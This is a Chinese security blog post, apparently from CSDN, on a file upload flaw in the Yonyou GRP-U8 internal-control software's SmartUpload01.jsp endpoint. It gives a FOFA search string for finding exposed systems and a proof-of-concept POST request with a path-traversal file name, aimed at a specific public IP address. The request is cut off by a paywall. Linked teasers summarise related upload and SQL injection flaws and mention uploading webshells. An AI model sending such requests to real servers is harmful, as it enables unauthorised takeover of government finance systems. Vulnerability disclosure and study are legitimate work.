用友GRP-U8 SmartUpload01 文件上传漏洞

最新推荐文章于 2024-11-22 09:43:54 发布
原创 最新推荐文章于 2024-11-22 09:43:54 发布 · 2.8k 阅读 · 10
标签
#web安全 #安全
文章报道了用友GRP-U8内控管理软件存在的文件上传漏洞,攻击者可借此上传恶意文件获取权限。文章详细描述了漏洞复现方法,并提出了通过防火墙和安全策略整改的建议。

漏洞描述

用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/u8qx/SmartUpload01.jsp接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

资产测绘

app=“用友-GRP-U8”

漏洞复现

poc:

POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: 111.230.26.150
Content-Type: multipart/form-data; boundary=----800717874476702101754515
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 3438

------800717874476702101754515
Content-Disposition: form-data; name="uname"

../../../../../../../../../gogogo
------800717874476702101754515
Content-Disposition: form-data; name="input_localfile"; filename="gogogo.pdf"

<jatools Class="jatools.ReportDocument" Name="jatools report template">
<VariableContext>
</VariableContext>
<Page>
<Name>panel</Name>
<Children ItemClass="PagePanel">
<Item0>
<Name>header</Name>
<Width>753</Width>
<Height>80</Height>
<Children ItemClass="Label">
<Item0>
<Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text>
<ForeColor>-65536</ForeColor>
<X>41</X>
<Y>15</Y>
<Width>362</Width>
<Height
最低0.47元/天 解锁文章
GRP-U8管理软件行政事业版数据库
01-24
GRP-U8管理软件行政事业版数据库中表非常多,函数非常多,但是仔细分析以后有用的仅仅只有四张表。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 2166
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
jsp——SmartUpload上传下载
hey,欢迎浏览我的博客,希望能给你提供帮助。
07-19 5616
SmartUpload 简介 SmartUpload组件是www.jspsmart.com网站开发的一套上传组件,它使用简单,方便。有以下几个特点: 使用简单。在JSP中仅仅书写三五行java代码就可以搞定文件的上传或下载。 能全程控制上传。利用SmartUpload组件提供的对象及其操作方法, 可以获得全部上传文件的信息(包括文件名,大小,类型,扩展名,文件数据等),方便存取 下载灵活。仅写两行代码,就能把Web服务器变成文件服务器。 不管文件在Web服务器的目录下或在其他任何目录下,都可以使用Sma.
万户OA smartUpload.jsp任意文件上传
weixin_43567873的博客
03-05 300
万户OA smartUpload.jsp任意文件上传
漏洞复现--用友GRP-U8-FileUpload任意文件上传
qq_53003652的博客
12-26 1065
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。访问/R9iPortal/upload/test.jsp。
用友GRP-U8 内控管理软件/servlet/FileUpload 任意文件上传漏洞复现
0xSec
12-23 1496
用友GRP-U8内控管理软件存在任意文件(/servlet/FileUpload)上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
用友 GRP-U8 UploadFileData
最新发布
fmjnb的博客
11-22 543
用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
漏洞复现--用友U8-Cloud upload.jsp任意文件上传
qq_53003652的博客
10-26 1007
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞。上传路径在/linux/{filename}.jsp。此处为国外网站资产,请勿非法利用!上传免杀马直接getshell。用友U8-Cloud。
用友 GRP U8 UploadFile 命令执行漏洞
李同學AI安全
01-23 1087
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞
用友GRP-U8 operOriztion SQL注入漏洞复现
04-25 991
用友GRP-U8行政事业内控管理软件是一个综合性的管理工具,旨在帮助政府及行政事业单位提高管理效率,确保财务和业务的规范运作。通过采用现代化的信息技术,它能够为用户提供稳定、全面且易于操作的管理平台。
用友GRP-U8 obr_zdybxd_check.jsp SQL注入
2301_80115097的博客
06-26 430
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-U8 obr_zdybxd_check.jsp SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
用友GRP-U8 obr_zdybxd_check.jsp存在SQL注入漏洞
qq_39573664的博客
01-23 945
用友GRP-U8R10行政事业内控管理软件在 obr_zdybxd_check.jsp 接口存在潜在的SQL注入漏洞,未经授权的攻击者有可能利用这个漏洞获取对数据库的权限。进一步的攻击可能导致攻击者获取服务器权限,带来严重的安全风险。
百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)
0xSec
02-07 1381
百卓Smart管理平台 uploadfile.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
用友GRP-U8 UploadFile 文件上传漏洞
Keepb1ue的博客
12-25 2154
用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/UploadFile接口存在文件上传漏洞,跟上篇文章类似,同样可以通过任意文件上传恶意后门文件,从而获取服务器权限。访问路径:/u8qx/tools/defaultviewer.jsp?通过防火墙等安全设备限制访问策略,设置内容检测机制和白名单访问。app=“用友-GRP-U8”如非必要,禁止公网访问该系统。
漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
今天是几号的博客
10-03 2220
在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png。用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。POC:拼接/u8qx/slbmbygr.jsp?使用SQLmap进行注入利用。
用友GRP-U8 U8AppProxy任意文件上传漏洞
qq_36334672的博客
01-25 696
用友GRP-U8行政事业内控管理软件(新政府会计制度专版)title=“用友GRP-U8行政事业内控管理软件”访问 /yongyouU8_test.jsp。
用友ERP-U8最新破解(再次更新版本,附安装过程中的解决办法)
热门推荐
weixin_34342578的博客
07-10 1万+
新版用友u8.70下载地址:http://ftp.shangyuchem.com/应用软件/用友ERP-U8管理软件(8.70版).rar 准备好安装环境,因为需要SQLSERVER和IIS支持,而个人的电脑又是VISTA basic版本的,处理起来比较麻烦,所以我先安装了(VirtualPC)虚拟机,在虚拟机上配置WIN2003+SP1+IIS6.0+SQLSERVER2000+补丁 然后开始安...
用友GRP-u8 注入-RCE漏洞复现
thelostworld
12-05 3968
用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一、漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 二、漏洞复现 SQL注入POC POST /Proxy HTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Ma...
用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
0xSec
03-21 6031
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
0xSec
01-30 767
用友GRP-U8R10行政事业内控管理软件forgetPassword_old.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值